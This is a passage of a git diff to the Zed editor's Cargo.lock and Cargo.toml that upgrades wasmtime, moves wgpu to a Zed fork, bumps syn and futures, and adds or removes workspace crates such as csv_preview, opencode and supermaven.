"c803a9fec05c3d7fa03474d4595079d546e77a3c71c1d09b21f74152e2165c17" dependencies = [ - "anyhow", "cc", - "cfg-if", - "rustix 1.1.2", - "wasmtime-asm-macros", - "wasmtime-versioned-export-macros", - "windows-sys 0.59.0", + "wasmtime-internal-versioned-export-macros", ] [[package]] -name = "wasmtime-jit-icache-coherence" -version = "33.0.2" +name = "wasmtime-internal-jit-icache-coherence" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7af0e940cb062a45c0b3f01a926f77da5947149e99beb4e3dd9846d5b8f11619" +checksum = "d3866909d37f7929d902e6011847748147e8734e9d7e0353e78fb8b98f586aee" dependencies = [ "anyhow", "cfg-if", "libc", - "windows-sys 0.59.0", + "windows-sys 0.60.2", ] [[package]] -name = "wasmtime-math" -version = "33.0.2" +name = "wasmtime-internal-math" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "acfca360e719dda9a27e26944f2754ff2fd5bad88e21919c42c5a5f38ddd93cb" +checksum = "5a23b03fb14c64bd0dfcaa4653101f94ade76c34a3027ed2d6b373267536e45b" dependencies = [ "libm", ] [[package]] -name = "wasmtime-slab" -version = "33.0.2" +name = "wasmtime-internal-slab" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "48e240559cada55c4b24af979d5f6c95e0029f5772f32027ec3c62b258aaff65" +checksum = "fbff220b88cdb990d34a20b13344e5da2e7b99959a5b1666106bec94b58d6364" + +[[package]] +name = "wasmtime-internal-unwinder" +version = "36.0.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "13e1ad30e88988b20c0d1c56ea4b4fbc01a8c614653cbf12ca50c0dcc695e2f7" +dependencies = [ + "anyhow", + "cfg-if", + "cranelift-codegen", + "log", + "object", +] [[package]] -name = "wasmtime-versioned-export-macros" -version = "33.0.2" +name = "wasmtime-internal-versioned-export-macros" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d0963c1438357a3d8c0efe152b4ef5259846c1cf8b864340270744fe5b3bae5e" +checksum = "549aefdaa1398c2fcfbf69a7b882956bb5b6e8e5b600844ecb91a3b5bf658ca7" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", +] + +[[package]] +name = "wasmtime-internal-winch" +version = "36.0.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5cc96a84c5700171aeecf96fa9a9ab234f333f5afb295dabf3f8a812b70fe832" +dependencies = [ + "anyhow", + "cranelift-codegen", + "gimli", + "object", + "target-lexicon 0.13.3", + "wasmparser 0.236.1", + "wasmtime-environ", + "wasmtime-internal-cranelift", + "winch-codegen", +] + +[[package]] +name = "wasmtime-internal-wit-bindgen" +version = "36.0.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c28dc9efea511598c88564ac1974e0825c07d9c0de902dbf68f227431cd4ff8c" +dependencies = [ + "anyhow", + "bitflags 2.10.0", + "heck 0.5.0", + "indexmap", + "wit-parser 0.236.1", ] [[package]] name = "wasmtime-wasi" -version = "33.0.2" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4ae951b72c7c6749a1c15dcdfb6d940a2614c932b4a54f474636e78e2c744b4c" +checksum = "c3c2e99fbaa0c26b4680e0c9af07e3f7b25f5fbc1ad97dd34067980bd027d3e5" dependencies = [ "anyhow", "async-trait", @@ -19510,7 +19937,7 @@ dependencies = [ "cap-std", "cap-time-ext", "fs-set-times", - "futures 0.3.31", + "futures 0.3.32", "io-extras", "io-lifetimes", "rustix 1.1.2", @@ -19522,51 +19949,22 @@ dependencies = [ "wasmtime", "wasmtime-wasi-io", "wiggle", - "windows-sys 0.59.0", + "windows-sys 0.60.2", ] [[package]] name = "wasmtime-wasi-io" -version = "33.0.2" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a835790dcecc3d7051ec67da52ba9e04af25e1bc204275b9391e3f0042b10797" +checksum = "de2dc367052562c228ce51ee4426330840433c29c0ea3349eca5ddeb475ecdb9" dependencies = [ "anyhow", "async-trait", "bytes 1.11.1", - "futures 0.3.31", + "futures 0.3.32", "wasmtime", ] -[[package]] -name = "wasmtime-winch" -version = "33.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cbc3b117d03d6eeabfa005a880c5c22c06503bb8820f3aa2e30f0e8d87b6752f" -dependencies = [ - "anyhow", - "cranelift-codegen", - "gimli 0.31.1", - "object 0.36.7", - "target-lexicon 0.13.3", - "wasmparser 0.229.0", - "wasmtime-cranelift", - "wasmtime-environ", - "winch-codegen", -] - -[[package]] -name = "wasmtime-wit-bindgen" -version = "33.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1382f4f09390eab0d75d4994d0c3b0f6279f86a571807ec67a8253c87cf6a145" -dependencies = [ - "anyhow", - "heck 0.5.0", - "indexmap", - "wit-parser 0.229.0", -] - [[package]] name = "wast" version = "35.0.2" @@ -19581,10 +19979,9 @@ name = "watch" version = "0.1.0" dependencies = [ "ctor", - "futures 0.3.31", + "futures 0.3.32", "gpui", "parking_lot", - "rand 0.9.2", "zlog", ] @@ -19703,9 +20100,9 @@ dependencies = [ [[package]] name = "web-sys" -version = "0.3.81" +version = "0.3.90" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9367c417a924a74cae129e6a2ae3b47fabb1f8995595ab474029da749a8be120" +checksum = "705eceb4ce901230f8625bd1d665128056ccbe4b7408faa625eec1ba80f59a97" dependencies = [ "js-sys", "wasm-bindgen", @@ -19718,6 +20115,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "5a6580f308b1fad9207618087a65c04e7a10bc77e02c8e84e9b00dd4b12fa0bb" dependencies = [ "js-sys", + "serde", "wasm-bindgen", ] @@ -19750,8 +20148,9 @@ version = "0.1.0" dependencies = [ "anyhow", "client", + "cloud_api_types", "cloud_llm_client", - "futures 0.3.31", + "futures 0.3.32", "gpui", "http_client", "language_model", @@ -19780,25 +20179,27 @@ dependencies = [ [[package]] name = "webrtc-sys" -version = "0.3.7" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=5f04705ac3f356350ae31534ffbc476abc9ea83d#5f04705ac3f356350ae31534ffbc476abc9ea83d" +version = "0.3.23" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1#147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1" dependencies = [ "cc", "cxx", "cxx-build", "glob", "log", + "pkg-config", "webrtc-sys-build", ] [[package]] name = "webrtc-sys-build" -version = "0.3.6" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=5f04705ac3f356350ae31534ffbc476abc9ea83d#5f04705ac3f356350ae31534ffbc476abc9ea83d" +version = "0.3.13" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1#147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1" dependencies = [ + "anyhow", "fs2", "regex", - "reqwest 0.11.27", + "reqwest 0.12.24", "scratch", "semver", "zip 0.6.6", @@ -19812,9 +20213,8 @@ checksum = "a751b3277700db47d3e574514de2eced5e54dc8a5436a3bf7a0b248b2cee16f3" [[package]] name = "wgpu" -version = "28.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f9cb534d5ffd109c7d1135f34cdae29e60eab94855a625dcfe1705f8bc7ad79f" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "arrayvec", "bitflags 2.10.0", @@ -19825,7 +20225,7 @@ dependencies = [ "hashbrown 0.16.1", "js-sys", "log", - "naga", + "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", "parking_lot", "portable-atomic", "profiling", @@ -19842,13 +20242,12 @@ dependencies = [ [[package]] name = "wgpu-core" -version = "28.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8bb4c8b5db5f00e56f1f08869d870a0dff7c8bc7ebc01091fec140b0cf0211a9" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "arrayvec", - "bit-set", - "bit-vec", + "bit-set 0.9.1", + "bit-vec 0.9.1", "bitflags 2.10.0", "bytemuck", "cfg_aliases 0.2.1", @@ -19856,7 +20255,7 @@ dependencies = [ "hashbrown 0.16.1", "indexmap", "log", - "naga", + "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", "once_cell", "parking_lot", "portable-atomic", @@ -19869,52 +20268,48 @@ dependencies = [ "wgpu-core-deps-emscripten", "wgpu-core-deps-windows-linux-android", "wgpu-hal", + "wgpu-naga-bridge", "wgpu-types", ] [[package]] name = "wgpu-core-deps-apple" -version = "28.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "87b7b696b918f337c486bf93142454080a32a37832ba8a31e4f48221890047da" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "wgpu-hal", ] [[package]] name = "wgpu-core-deps-emscripten" -version = "28.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "34b251c331f84feac147de3c4aa3aa45112622a95dd7ee1b74384fa0458dbd79" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "wgpu-hal", ] [[package]] name = "wgpu-core-deps-windows-linux-android" -version = "28.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "68ca976e72b2c9964eb243e281f6ce7f14a514e409920920dcda12ae40febaae" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "wgpu-hal", ] [[package]] name = "wgpu-hal" -version = "28.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "293080d77fdd14d6b08a67c5487dfddbf874534bb7921526db56a7b75d7e3bef" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "android_system_properties", "arrayvec", "ash", - "bit-set", + "bit-set 0.9.1", "bitflags 2.10.0", - "block", + "block2", "bytemuck", "cfg-if", "cfg_aliases 0.2.1", - "core-graphics-types 0.2.0", "glow", "glutin_wgl_sys", "gpu-allocator", @@ -19925,10 +20320,13 @@ dependencies = [ "libc", "libloading", "log", - "metal", - "naga", + "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", "ndk-sys", - "objc", + "objc2", + "objc2-core-foundation", + "objc2-foundation", + "objc2-metal", + "objc2-quartz-core", "once_cell", "ordered-float 4.6.0", "parking_lot", @@ -19937,26 +20335,38 @@ dependencies = [ "profiling", "range-alloc", "raw-window-handle", + "raw-window-metal", "renderdoc-sys", "smallvec", "thiserror 2.0.17", "wasm-bindgen", + "wayland-sys", "web-sys", + "wgpu-naga-bridge", "wgpu-types", "windows 0.62.2", "windows-core 0.62.2", ] +[[package]] +name = "wgpu-naga-bridge" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" +dependencies = [ + "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", + "wgpu-types", +] + [[package]] name = "wgpu-types" -version = "28.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e18308757e594ed2cd27dddbb16a139c42a683819d32a2e0b1b0167552f5840c" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "bitflags 2.10.0", "bytemuck", "js-sys", "log", + "raw-window-handle", "web-sys", ] @@ -19992,7 +20402,7 @@ dependencies = [ "gpui", "serde", "settings", - "theme", + "theme_settings", "ui", "util", "workspace", @@ -20010,9 +20420,9 @@ dependencies = [ [[package]] name = "wiggle" -version = "33.0.2" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "649c1aca13ef9e9dccf2d5efbbebf12025bc5521c3fb7754355ef60f5eb810be" +checksum = "c13d1ae265bd6e5e608827d2535665453cae5cb64950de66e2d5767d3e32c43a" dependencies = [ "anyhow", "async-trait", @@ -20025,27 +20435,27 @@ dependencies = [ [[package]] name = "wiggle-generate" -version = "33.0.2" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "164870fc34214ee42bd81b8ce9e7c179800fa1a7d4046d17a84e7f7bf422c8ad" +checksum = "607c4966f6b30da20d24560220137cbd09df722f0558eac81c05624700af5e05" dependencies = [ "anyhow", "heck 0.5.0", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "witx", ] [[package]] name = "wiggle-macro" -version = "33.0.2" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d873bb5b59ca703b5e41562e96a4796d1af61bf4cf80bf8a7abda755a380ec1c" +checksum = "fc36e39412fa35f7cc86b3705dbe154168721dd3e71f6dc4a726b266d5c60c55" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "wiggle-generate", ] @@ -20071,7 +20481,7 @@ version = "0.1.11" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22" dependencies = [ - "windows-sys 0.48.0", + "windows-sys 0.61.2", ] [[package]] @@ -20082,21 +20492,22 @@ checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" [[package]] name = "winch-codegen" -version = "33.0.2" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7914c296fbcef59d1b89a15e82384d34dc9669bc09763f2ef068a28dd3a64ebf" +checksum = "06c0ec09e8eb5e850e432da6271ed8c4a9d459a9db3850c38e98a3ee9d015e79" dependencies = [ "anyhow", "cranelift-assembler-x64", "cranelift-codegen", - "gimli 0.31.1", + "gimli", "regalloc2", "smallvec", "target-lexicon 0.13.3", "thiserror 2.0.17", - "wasmparser 0.229.0", - "wasmtime-cranelift", + "wasmparser 0.236.1", "wasmtime-environ", + "wasmtime-internal-cranelift", + "wasmtime-internal-math", ] [[package]] @@ -20268,7 +20679,7 @@ checksum = "9107ddc059d5b6fbfbffdfa7a7fe3e22a226def0b2608f72e9d552763d3e1ad7" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -20279,7 +20690,7 @@ checksum = "2bbd5b46c938e506ecbce286b6628a02171d56153ba733b6c741fc627ec9579b" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -20290,7 +20701,7 @@ checksum = "053e2e040ab57b9dc951b72c264860db7eb3b0200ba345b4e4c3b14f67855ddf" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -20301,7 +20712,7 @@ checksum = "29bee4b38ea3cde66011baa44dba677c432a78593e202392d1e9070cf2a7fca7" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -20312,7 +20723,7 @@ checksum = "053c4c462dc91d3b1504c6fe5a726dd15e216ba718e84a0e46a88fbe5ded3515" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -20323,7 +20734,7 @@ checksum = "3f316c4a2570ba26bbec722032c4099d8c8bc095efccdc15688708623367e358" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -20933,7 +21344,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c4db52a11d4dfb0a59f194c064055794ee6564eb1ced88c25da2cf76e50c5621" dependencies = [ "bitflags 2.10.0", - "futures 0.3.31", + "futures 0.3.32", "once_cell", ] @@ -20961,7 +21372,7 @@ dependencies = [ "heck 0.5.0", "indexmap", "prettyplease", - "syn 2.0.106", + "syn 2.0.117", "wasm-metadata 0.227.1", "wit-bindgen-core 0.41.0", "wit-component 0.227.1", @@ -20977,7 +21388,7 @@ dependencies = [ "heck 0.5.0", "indexmap", "prettyplease", - "syn 2.0.106", + "syn 2.0.117", "wasm-metadata 0.244.0", "wit-bindgen-core 0.51.0", "wit-component 0.244.0", @@ -20992,7 +21403,7 @@ dependencies = [ "anyhow", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "wit-bindgen-core 0.22.0", "wit-bindgen-rust 0.22.0", ] @@ -21007,7 +21418,7 @@ dependencies = [ "prettyplease", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "wit-bindgen-core 0.41.0", "wit-bindgen-rust 0.41.0", ] @@ -21022,7 +21433,7 @@ dependencies = [ "prettyplease", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "wit-bindgen-core 0.51.0", "wit-bindgen-rust 0.51.0", ] @@ -21122,9 +21533,9 @@ dependencies = [ [[package]] name = "wit-parser" -version = "0.229.0" +version = "0.236.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "459c6ba62bf511d6b5f2a845a2a736822e38059c1cfa0b644b467bbbfae4efa6" +checksum = "16e4833a20cd6e85d6abfea0e63a399472d6f88c6262957c17f546879a80ba15" dependencies = [ "anyhow", "id-arena", @@ -21135,7 +21546,7 @@ dependencies = [ "serde_derive", "serde_json", "unicode-xid", - "wasmparser 0.229.0", + "wasmparser 0.236.1", ] [[package]] @@ -21172,20 +21583,19 @@ dependencies = [ name = "workspace" version = "0.1.0" dependencies = [ + "agent_settings", "any_vec", "anyhow", "async-recursion", - "call", "chrono", "client", "clock", "collections", "component", - "dap", "db", "feature_flags", "fs", - "futures 0.3.31", + "futures 0.3.32", "git", "gpui", "http_client", @@ -21212,9 +21622,11 @@ dependencies = [ "telemetry", "tempfile", "theme", + "theme_settings", "ui", "util", "uuid", + "vim_mode_setting", "windows 0.61.3", "zed_actions", "zlog", @@ -21231,12 +21643,10 @@ dependencies = [ "collections", "encoding_rs", "fs", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "git", - "git2", "gpui", - "http_client", "ignore", "language", "log", @@ -21440,16 +21850,23 @@ checksum = "ec7a2a501ed189703dba8b08142f057e887dfc4b2cc4db2d343ac6376ba3e0b9" name = "xtask" version = "0.1.0" dependencies = [ + "annotate-snippets", "anyhow", "backtrace", - "cargo_metadata", + "cargo_metadata 0.19.2", "cargo_toml", "clap", + "compliance", "gh-workflow", "indexmap", "indoc", + "itertools 0.14.0", + "regex", "serde", "serde_json", + "serde_yaml", + "strum 0.27.2", + "tokio", "toml 0.8.23", "toml_edit 0.22.27", ] @@ -21480,7 +21897,7 @@ dependencies = [ "base64 0.22.1", "bytes 1.11.1", "flate2", - "futures 0.3.31", + "futures 0.3.32", "http-body-util", "hyper 1.7.0", "hyper-util", @@ -21549,7 +21966,7 @@ checksum = "2380878cad4ac9aac1e2435f3eb4020e8374b5f13c296cb75b4620ff8e229154" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "synstructure", ] @@ -21561,7 +21978,7 @@ checksum = "38da3c9736e16c5d3c8c597a9aaa5d1fa565d0532ae05e27c24aa62fb32c0ab6" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "synstructure", ] @@ -21609,7 +22026,7 @@ dependencies = [ "proc-macro-crate", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "zbus_names", "zvariant", "zvariant_utils", @@ -21628,7 +22045,7 @@ dependencies = [ [[package]] name = "zed" -version = "0.227.0" +version = "0.232.0" dependencies = [ "acp_thread", "acp_tools", @@ -21646,7 +22063,6 @@ dependencies = [ "audio", "auto_update", "auto_update_ui", - "bincode", "breadcrumbs", "call", "channel", @@ -21665,7 +22081,7 @@ dependencies = [ "copilot_chat", "copilot_ui", "crashes", - "dap", + "csv_preview", "dap_adapters", "db", "debug_adapter_extension", @@ -21686,7 +22102,7 @@ dependencies = [ "feedback", "file_finder", "fs", - "futures 0.3.31", + "futures 0.3.32", "git", "git_graph", "git_hosting_providers", @@ -21729,6 +22145,7 @@ dependencies = [ "parking_lot", "paths", "picker", + "pkg-config", "pretty_assertions", "profiling", "project", @@ -21756,7 +22173,6 @@ dependencies = [ "smol", "snippet_provider", "snippets_ui", - "supermaven", "svg_preview", "sysinfo 0.37.2", "system_specs", @@ -21770,13 +22186,12 @@ dependencies = [ "theme", "theme_extension", "theme_selector", + "theme_settings", "time", "time_format", "title_bar", "toolchain_selector", "tracing", - "tree-sitter-md", - "tree-sitter-rust", "ui", "ui_prompt", "url", @@ -21919,10 +22334,24 @@ dependencies = [ ] [[package]] -name = "zed_env_vars" +name = "zed_credentials_provider" version = "0.1.0" dependencies = [ + "anyhow", + "credentials_provider", + "futures 0.3.32", "gpui", + "paths", + "release_channel", + "serde", + "serde_json", +] + +[[package]] +name = "zed_env_vars" +version = "0.1.0" +dependencies = [ + "env_var", ] [[package]] @@ -21958,21 +22387,21 @@ dependencies = [ [[package]] name = "zed_glsl" -version = "0.2.0" +version = "0.2.3" dependencies = [ "zed_extension_api 0.1.0", ] [[package]] name = "zed_html" -version = "0.3.0" +version = "0.3.1" dependencies = [ "zed_extension_api 0.7.0", ] [[package]] name = "zed_proto" -version = "0.3.1" +version = "0.3.2" dependencies = [ "zed_extension_api 0.7.0", ] @@ -22007,7 +22436,7 @@ checksum = "88d2b8d9c68ad2b9e4340d7832716a4d21a22a1154777ad56ea55c51a9cf3831" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -22027,7 +22456,7 @@ checksum = "d71e5d6e06ab090c67b5e44993ec16b72dcbaabc526db883a360057678b48502" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "synstructure", ] @@ -22048,7 +22477,7 @@ checksum = "ce36e65b0d2999d2aafac989fb249189a141aee1f53c612c1f37d72631959f69" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -22063,7 +22492,7 @@ dependencies = [ "asynchronous-codec", "bytes 1.11.1", "crossbeam-queue", - "futures 0.3.31", + "futures 0.3.32", "log", "num-traits", "once_cell", @@ -22105,7 +22534,7 @@ checksum = "5b96237efa0c878c64bd89c436f661be4e46b2f3eff1ebb976f7ef2321d2f58f" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -22113,6 +22542,7 @@ name = "zeta_prompt" version = "0.1.0" dependencies = [ "anyhow", + "imara-diff", "indoc", "serde", "strum 0.27.2", @@ -22126,7 +22556,7 @@ checksum = "760394e246e4c28189f19d488c058bf16f564016aefac5d32bb1f3b51d5e9261" dependencies = [ "aes", "byteorder", - "bzip2", + "bzip2 0.4.4", "constant_time_eq", "crc32fast", "crossbeam-utils", @@ -22267,7 +22697,7 @@ dependencies = [ "proc-macro-crate", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "zvariant_utils", ] @@ -22280,6 +22710,6 @@ dependencies = [ "proc-macro2", "quote", "serde", - "syn 2.0.106", + "syn 2.0.117", "winnow", ] diff --git a/Cargo.toml b/Cargo.toml index ac80f187e6ffc16a95753e83ae7a333c6bc9ffdb..5cb5b991b645ec1b78b16f48493c7c8dc1426344 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -13,9 +13,6 @@ members = [ "crates/anthropic", "crates/askpass", "crates/assets", - "crates/assistant_slash_command", - "crates/assistant_slash_commands", - "crates/assistant_text_thread", "crates/audio", "crates/auto_update", "crates/auto_update_helper", @@ -45,6 +42,7 @@ members = [ "crates/copilot_chat", "crates/crashes", "crates/credentials_provider", + "crates/csv_preview", "crates/dap", "crates/dap_adapters", "crates/db", @@ -63,8 +61,9 @@ members = [ "crates/edit_prediction_ui", "crates/editor", "crates/encoding_selector", + "crates/env_var", "crates/etw_tracing", - "crates/eval", + "crates/eval_cli", "crates/eval_utils", "crates/explorer_command_injector", "crates/extension", @@ -85,6 +84,7 @@ members = [ "crates/git_ui", "crates/go_to_line", "crates/google_ai", + "crates/grammars", "crates/gpui", "crates/gpui_linux", "crates/gpui_macos", @@ -106,6 +106,7 @@ members = [ "crates/json_schema_store", "crates/keymap_editor", "crates/language", + "crates/language_core", "crates/language_extension", "crates/language_model", "crates/language_models", @@ -132,6 +133,7 @@ members = [ "crates/notifications", "crates/ollama", "crates/onboarding", + "crates/opencode", "crates/open_ai", "crates/open_path_prompt", "crates/open_router", @@ -157,7 +159,6 @@ members = [ "crates/remote_server", "crates/repl", "crates/reqwest_client", - "crates/rich_text", "crates/rope", "crates/rpc", "crates/rules_library", @@ -182,10 +183,9 @@ members = [ "crates/storybook", "crates/streaming_diff", "crates/sum_tree", - "crates/supermaven", - "crates/supermaven_api", "crates/svg_preview", "crates/system_specs", + "crates/syntax_theme", "crates/tab_switcher", "crates/task", "crates/tasks_ui", @@ -196,6 +196,7 @@ members = [ "crates/text", "crates/theme", "crates/theme_extension", + "crates/theme_settings", "crates/theme_importer", "crates/theme_selector", "crates/time_format", @@ -220,6 +221,7 @@ members = [ "crates/x_ai", "crates/zed", "crates/zed_actions", + "crates/zed_credentials_provider", "crates/zed_env_vars", "crates/zeta_prompt", "crates/zlog", @@ -234,13 +236,13 @@ members = [ "extensions/glsl", "extensions/html", "extensions/proto", - "extensions/slash-commands-example", "extensions/test-extension", # # Tooling # + "tooling/compliance", "tooling/perf", "tooling/xtask", ] @@ -268,9 +270,6 @@ ai_onboarding = { path = "crates/ai_onboarding" } anthropic = { path = "crates/anthropic" } askpass = { path = "crates/askpass" } assets = { path = "crates/assets" } -assistant_text_thread = { path = "crates/assistant_text_thread" } -assistant_slash_command = { path = "crates/assistant_slash_command" } -assistant_slash_commands = { path = "crates/assistant_slash_commands" } audio = { path = "crates/audio" } auto_update = { path = "crates/auto_update" } auto_update_ui = { path = "crates/auto_update_ui" } @@ -291,6 +290,7 @@ collab_ui = { path = "crates/collab_ui" } collections = { path = "crates/collections", version = "0.1.0" } command_palette = { path = "crates/command_palette" } command_palette_hooks = { path = "crates/command_palette_hooks" } +compliance = { path = "tooling/compliance" } component = { path = "crates/component" } component_preview = { path = "crates/component_preview" } context_server = { path = "crates/context_server" } @@ -300,6 +300,7 @@ copilot_ui = { path = "crates/copilot_ui" } crashes = { path = "crates/crashes" } credentials_provider = { path = "crates/credentials_provider" } crossbeam = "0.8.4" +csv_preview = { path = "crates/csv_preview"} dap = { path = "crates/dap" } dap_adapters = { path = "crates/dap_adapters" } db = { path = "crates/db" } @@ -312,6 +313,7 @@ dev_container = { path = "crates/dev_container" } diagnostics = { path = "crates/diagnostics" } editor = { path = "crates/editor" } encoding_selector = { path = "crates/encoding_selector" } +env_var = { path = "crates/env_var" } etw_tracing = { path = "crates/etw_tracing" } eval_utils = { path = "crates/eval_utils" } extension = { path = "crates/extension" } @@ -329,6 +331,7 @@ git_hosting_providers = { path = "crates/git_hosting_providers" } git_ui = { path = "crates/git_ui" } go_to_line = { path = "crates/go_to_line" } google_ai = { path = "crates/google_ai" } +grammars = { path = "crates/grammars" } gpui = { path = "crates/gpui", default-features = false } gpui_linux = { path = "crates/gpui_linux", default-features = false } gpui_macos = { path = "crates/gpui_macos", default-features = false } @@ -353,6 +356,7 @@ journal = { path = "crates/journal" } json_schema_store = { path = "crates/json_schema_store" } keymap_editor = { path = "crates/keymap_editor" } language = { path = "crates/language" } +language_core = { path = "crates/language_core" } language_extension = { path = "crates/language_extension" } language_model = { path = "crates/language_model" } language_models = { path = "crates/language_models" } @@ -370,7 +374,7 @@ markdown_preview = { path = "crates/markdown_preview" } svg_preview = { path = "crates/svg_preview" } media = { path = "crates/media" } menu = { path = "crates/menu" } -mermaid-rs-renderer = { git = "https://github.com/zed-industries/mermaid-rs-renderer", branch = "fix-font-family-xml-escaping", default-features = false } +mermaid-rs-renderer = { git = "https://github.com/zed-industries/mermaid-rs-renderer", rev = "374db9ead5426697c6c2111151d9f246899bc638", default-features = false } migrator = { path = "crates/migrator" } mistral = { path = "crates/mistral" } multi_buffer = { path = "crates/multi_buffer" } @@ -381,6 +385,7 @@ node_runtime = { path = "crates/node_runtime" } notifications = { path = "crates/notifications" } ollama = { path = "crates/ollama" } onboarding = { path = "crates/onboarding" } +opencode = { path = "crates/opencode" } open_ai = { path = "crates/open_ai" } open_path_prompt = { path = "crates/open_path_prompt" } open_router = { path = "crates/open_router", features = ["schemars"] } @@ -427,10 +432,9 @@ sqlez_macros = { path = "crates/sqlez_macros" } story = { path = "crates/story" } streaming_diff = { path = "crates/streaming_diff" } sum_tree = { path = "crates/sum_tree" } -supermaven = { path = "crates/supermaven" } -supermaven_api = { path = "crates/supermaven_api" } codestral = { path = "crates/codestral" } system_specs = { path = "crates/system_specs" } +syntax_theme = { path = "crates/syntax_theme" } tab_switcher = { path = "crates/tab_switcher" } task = { path = "crates/task" } tasks_ui = { path = "crates/tasks_ui" } @@ -441,6 +445,7 @@ terminal_view = { path = "crates/terminal_view" } text = { path = "crates/text" } theme = { path = "crates/theme" } theme_extension = { path = "crates/theme_extension" } +theme_settings = { path = "crates/theme_settings" } theme_selector = { path = "crates/theme_selector" } time_format = { path = "crates/time_format" } platform_title_bar = { path = "crates/platform_title_bar" } @@ -465,6 +470,7 @@ worktree = { path = "crates/worktree" } x_ai = { path = "crates/x_ai" } zed = { 